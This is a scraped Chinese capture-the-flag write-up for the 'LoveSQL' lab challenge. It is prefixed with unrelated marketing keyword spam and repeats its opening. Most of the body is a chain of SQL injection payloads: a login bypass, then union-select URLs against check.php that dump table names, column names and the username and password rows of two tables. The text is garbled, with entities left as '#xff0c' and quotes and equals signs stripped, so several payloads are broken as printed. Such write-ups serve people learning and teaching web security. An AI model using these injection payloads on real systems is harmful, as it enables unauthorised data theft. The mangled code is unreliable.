免费的网站有哪些,网络营销的流程和方法,php除了 wordpress,外国网站邀请做编辑题目 打开页面显示如下 查看源代码#xff0c;查到一个check.php#xff0c;还是get传参 尝试账号密码输入 题目名为sql#xff0c;用万能密码
1or 11#
或
admin or 11 给了一段乱码#xff0c;也不是flag
查看字段数
/check.php?usernameadmin order by 3%23pass…题目 打开页面显示如下 查看源代码查到一个check.php还是get传参 尝试账号密码输入 题目名为sql用万能密码
1or 11#
或
admin or 11 给了一段乱码也不是flag
查看字段数
/check.php?usernameadmin order by 3%23password1 到4时报错说明字段数为3 用union来查询测试注入点查看回显点
构造payload
/check.php?username1 union select 1,2,3%23password1
显示回显点为2和3 查看数据库
/check.php?username1 union select 1,database(),version()%23password1
可得到数据库名为geek
查看数据表
/check.php?username1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()%23password1
得到两个数据表 查看表中字段
/check.php?username1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namegeekuser%23password1/check.php?username1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namel0ve1ysq1%23password1
字段都是一样的
查看表中数据
/check.php?username1 union select 1,2,group_concat(id,username,password) from geekuser%23password1/check.php?username1 union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23password1 geekuser表中数据为 l0ve1ysq1表中数据为 查看不全看源代码 总结
用union来查询测试注入点查看回显点 参考文章链接
CTF-Web-[极客大挑战 2019]LoveSQL - 知乎
LoveSQL-CSDN博客
